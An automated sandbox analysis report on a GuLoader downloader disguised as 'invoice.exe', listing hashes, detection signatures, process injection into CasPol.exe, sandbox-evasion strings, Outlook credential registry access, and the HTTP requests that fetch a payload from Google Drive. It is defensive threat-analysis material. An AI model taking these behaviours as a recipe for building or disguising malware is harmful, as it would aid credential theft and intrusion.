Windows Analysis Report
invoice.exe

Overview

General Information

Sample Name: invoice.exe
Analysis ID: 828743
MD5: f111934675c34cca18d9d76fc34a2e40
SHA1: 6c54e0fbae03df56fee84195f3deb4d2ebd8d8c1
SHA256: c627b8bb6c4ea0cf03aa2d209d0ecc53ff9784283328dabd44c1675aef0939c2

Detection

GuLoader
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
May check the online IP address of the machine
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Drops certificate files (DER)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • invoice.exe (PID: 4636 cmdline: C:\Users\user\Desktop\invoice.exe MD5: F111934675C34CCA18D9D76FC34A2E40)
    • CasPol.exe (PID: 1520 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 4620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000001.00000002.8704170676.000000000666B000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
    No Sigma rule has matched
    Timestamp: 03/17/23-14:34:28.679795
    Source IP: 192.168.11.20
    Destination IP: 193.122.130.0
    SID: 2039190
    Source Port: 49842
    Destination Port: 80
    Protocol: TCP
    Classtype: A Network Trojan was detected

    AV Detection

    Source: invoice.exe | Virustotal: Detection: 27%
    Source: invoice.exe | ReversingLabs: Detection: 35%
    Source: invoice.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49840 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49841 version: TLS 1.2
    Source: invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_00406268 FindFirstFileA,FindClose,1_2_00406268
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_0040572D
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_004026F8 FindFirstFileA,1_2_004026F8
    Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user
    Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData
    Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming
    Source: C:\Users\user\Desktop\invoice.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 4x nop then jmp 377478CCh, 5_2_37746DE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h, 5_2_37746300

    Networking

    Source: Traffic | Snort IDS: 2039190 ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.11.20:49842 -> 193.122.130.0:80
    Source: unknown | DNS query: name: checkip.dyndns.org
    Source: Joe Sandbox View | ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
    Source: global traffic | HTTP traffic detected:
        GET /uc?export=download&id=1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: drive.google.com
        Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected:
        GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Cache-Control: no-cache
        Host: doc-0k-a8-docs.googleusercontent.com
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
        Host: checkip.dyndns.org
        Connection: Keep-Alive
    Source: unknown | Network traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknown | Network traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | DNS traffic detected: queries for: drive.google.com
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,1_2_004051CA
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship\vmusbmouse.cat (dropped file)

    System Summary

    Source: initial sample | Static PE information: Filename: invoice.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004031F1
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_00406742
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_00404A09
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_00406F19
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 5_2_37746DE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 5_2_37746300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 5_2_377462EF
    Source: C:\Users\user\Desktop\invoice.exe | Process Stats: CPU usage > 98%
    Source: lang-1059.dll.1.dr | Static PE information: No import functions for PE file found
    Source: invoice.exe, 00000001.00000000.7326884916.0000000000441000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepaaklders Nonblameful.exe` vs invoice.exe
    Source: C:\Users\user\Desktop\invoice.exe | Section loaded: edgegdi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: edgegdi.dll
    Source: invoice.exe | Static PE information: invalid certificate
    Source: C:\Users\user\Desktop\invoice.exe | File read: C:\Users\user\Desktop\invoice.exe
    Source: invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
    Source: C:\Users\user\Desktop\invoice.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\invoice.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Temp\nsdA999.tmp
    Source: classification engine | Classification label: mal88.troj.spyw.evad.winEXE@5/19@3/3
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_004020CB LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,1_2_004020CB
    Source: C:\Users\user\Desktop\invoice.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_00404496 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404496
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:304:WilStaging_02
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1520
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

    Data Obfuscation

    Source: Yara match | File source: 00000001.00000002.8704170676.000000000666B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_10002D20 push eax; ret 1_2_10002D4E
    Source: Mss32.dll.1.dr | Static PE information: section name: MSSMIXER
    Source: NMDllHost.exe.1.dr | Static PE information: section name: .shared
    Source: C:\Users\user\Desktop\invoice.exe | Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_10001A5D
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe (dropped file)
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll (dropped file)
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe (dropped file)
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll (dropped file)
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\AdvSplash.dll (dropped file)
    Source: C:\Users\user\Desktop\invoice.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll (dropped file)
    Source: C:\Users\user\Desktop\invoice.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Program Files\qga\qga.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
    Source: invoice.exe, 00000001.00000002.8702090248.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEN<
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Users\user\Desktop\invoice.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe
    Source: C:\Users\user\Desktop\invoice.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe
    Source: C:\Users\user\Desktop\invoice.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll
    Source: C:\Users\user\Desktop\invoice.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll
    Source: C:\Users\user\Desktop\invoice.exe Code function: 1_2_00406268 FindFirstFileA,FindClose,1_2_00406268
    Source: C:\Users\user\Desktop\invoice.exe Code function: 1_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_0040572D
    Source: C:\Users\user\Desktop\invoice.exe Code function: 1_2_004026F8 FindFirstFileA,1_2_004026F8
    Source: C:\Users\user\Desktop\invoice.exe API call chain: ExitProcess graph end node graph_1-4240
    Source: C:\Users\user\Desktop\invoice.exe API call chain: ExitProcess graph end node graph_1-4062
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Users\user
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Users\user\AppData
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Users\user\AppData\Roaming
    Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
    Source: invoice.exe, 00000001.00000002.8702090248.000000000069E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: invoice.exe, 00000001.00000002.8702090248.0000000000658000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exen<
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
    Source: CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
    Source: CasPol.exe, 00000005.00000002.8995413020.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
    Source: invoice.exe, 00000001.00000002.8818311496.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
    Source: CasPol.exe, 00000005.00000002.8999553372.0000000008B69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
    Source: C:\Users\user\Desktop\invoice.exe Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_10001A5D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
    Source: C:\Users\user\Desktop\invoice.exe Code function: 1_2_00402D48 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,SetFilePointer,1_2_00402D48
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\invoice.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000
    Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\invoice.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\invoice.exe Code function: 1_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004031F1
    Source: CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.9014975295.00000000378A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
    | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
    | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
    | Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 1 Disable or Modify Tools | Security Account Manager | 1 System Network Configuration Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
    | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Access Token Manipulation | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
    | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 111 Process Injection | LSA Secrets | 15 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
    | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
    | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | invoice.exe | 28% | Virustotal | |
    | invoice.exe | 36% | ReversingLabs | Win32.Trojan.Tnega |

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll | 0% | ReversingLabs | |
    | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe | 2% | ReversingLabs | |
    | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll | 0% | ReversingLabs | |
    | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe | 0% | ReversingLabs | |
    | C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\AdvSplash.dll | 0% | ReversingLabs | |
    | C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll | 0% | ReversingLabs | |

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | 1.2.invoice.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 |
    | 1.0.invoice.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 |

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | checkip.dyndns.com | 0% | Virustotal | |
    | checkip.dyndns.org | 0% | Virustotal | |

    | Source | Detection | Scanner | Label |
    |---|---|---|---|
    | http://www.avast.com0/ | 0% | Avira URL Cloud | safe |
    | http://checkip.dyndns.org | 0% | Avira URL Cloud | safe |
    | http://checkip.dyndns.com | 0% | Avira URL Cloud | safe |
    | http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe |
    | http://checkip.dyndns.com | 0% | Virustotal | |
    | http://checkip.dyndns.org | 0% | Virustotal | |
    | http://checkip.dyndns.org/ | 0% | Virustotal | |

    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
    |---|---|---|---|---|---|
    | drive.google.com | 142.250.184.206 | true | false | | high |
    | googlehosted.l.googleusercontent.com | 142.250.186.33 | true | false | | high |
    | checkip.dyndns.com | 193.122.130.0 | true | true | | unknown |
